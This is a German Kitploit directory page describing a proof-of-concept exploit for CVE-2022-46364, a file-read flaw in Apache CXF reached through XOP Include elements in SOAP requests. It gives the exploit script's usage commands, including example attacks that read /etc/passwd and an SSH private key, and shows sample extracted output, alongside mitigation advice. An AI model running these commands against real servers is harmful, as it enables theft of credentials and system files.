Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-46364---Apache-CXF-XOP-Include-LFI-PoC — Proof-of-Concept-Exploit für CVE-2022-46364, eine Local File Inclusion-Schwachstelle in Apache CXF über manipulierte XOP-Include-Elemente in SOAP-Anfragen, die beliebiges Lesen von Dateien ermöglicht. | Kitploit
Tools/GitHubGitHub/shashivanth009/cve-2022-46364---apache-cxf-xop-include-lfi-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubshashivanth009/cve-2022-46364---apache-cxf-xop-include-lfi-poc

CVE-2022-46364---Apache-CXF-XOP-Include-LFI-PoC

Proof-of-Concept-Exploit für CVE-2022-46364, eine Local File Inclusion-Schwachstelle in Apache CXF über manipulierte XOP-Include-Elemente in SOAP-Anfragen, die beliebiges Lesen von Dateien ermöglicht.

Repository anzeigen
12vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Apache CXF XOP Include LFI (CVE-2022-46364)

Übersicht

Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2022-46364, eine Local File Inclusion (LFI)-Sicherheitslücke in Apache CXF.

Die Sicherheitslücke entsteht durch unsachgemäße Handhabung von XOP (XML-binary Optimized Packaging) Include-Elementen in SOAP-Anfragen, wodurch Angreifer beliebige Dateien vom Server lesen können.


Schwachstellendetails

  • CVE-ID: CVE-2022-46364
  • Komponente: Apache CXF
  • Schwachstellentyp: Local File Inclusion (LFI)
  • Angriffsvektor: Remote (in einigen Fällen ohne Authentifizierung)
  • Auswirkung: Beliebiger Dateilesen auf dem Server

Ursache

Apache CXF verarbeitet <xop:Include>-Elemente innerhalb von SOAP-Anfragen unsachgemäß. Durch die Angabe eines manipulierten href (z. B. file:///etc/passwd) kann der Server lokale Dateiinhalte einfügen und zurückgeben.


Betroffene Versionen

  • Apache CXF-Versionen vor dem patchten Release (3.4.x / 3.5.x je nach Branch)

Überprüfen Sie immer die genaue anfällige Version in Ihrer Zielumgebung.


Exploitation-Ablauf

  1. Angreifer sendet eine manipulierte SOAP-Anfrage
  2. Fügt <xop:Include href="file:///path/to/file"> ein
  3. Server verarbeitet die Anfrage und liest die lokale Datei
  4. Der Dateiinhalt wird innerhalb der SOAP-Antwort zurückgegeben

Repository-Struktur

root@kitploit:~
.
├── cxf_lfi.sh       # Exploit script
├── README.md        # Documentation
├── LICENSE          # MIT License
└── .gitignore

Voraussetzungen

  • Bash
  • curl
  • base64 (optional, zum Dekodieren der Ausgabe)

Verwendung

1. Skript ausführbar machen

root@kitploit:~
chmod +x cxf_lfi.sh

2. Ziel-URL bearbeiten

Update the target inside the script:

root@kitploit:~
TARGET="http://<TARGET_IP>:8080/employeeservice"

3. Exploit ausführen

root@kitploit:~
./cxf_lfi.sh file:///etc/passwd

Beispielangriffe

Beispiel 1: Systembenutzer lesen

root@kitploit:~
./cxf_lfi.sh file:///etc/passwd

Beispiel 2: Anwendungsgeheimnisse lesen

root@kitploit:~
./cxf_lfi.sh file:///home/user/.ssh/id_rsa

Beispielausgabe

root@kitploit:~
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Hinweise & Einschränkungen

  • Einige Server können:

    • Base64-kodierten Inhalt zurückgeben
    • Dateizugriff über Berechtigungen einschränken
    • file://-Schemen bereinigen oder blockieren
  • Die Ausgabe-Analyse hängt vom Antwortformat ab und kann manuelle Überprüfung erfordern.


Erkennung & Minderung

Erkennung

  • Überwachen Sie ungewöhnliche SOAP-Anfragen, die Folgendes enthalten:

    • <xop:Include>
    • file:// URIs

Minderung

  • Aktualisieren Sie Apache CXF auf eine gepatchte Version
  • Deaktivieren oder beschränken Sie die XOP-Verarbeitung, wenn nicht erforderlich
  • Validieren und bereinigen Sie eingehende SOAP-Nutzdaten

Haftungsausschluss für ethische Nutzung

Dieses Projekt ist bestimmt für:

  • Bildungszwecke
  • Autorisierte Penetrationstests

Verwenden Sie dieses Tool nicht auf Systemen ohne ausdrückliche Erlaubnis.


Referenzen

  • Apache CXF Sicherheitshinweise
  • CVE-Datenbank (CVE-2022-46364)

Autor

Entwickelt im Rahmen von Sicherheitsforschung und CTF-Übungen.

Tool herunterladen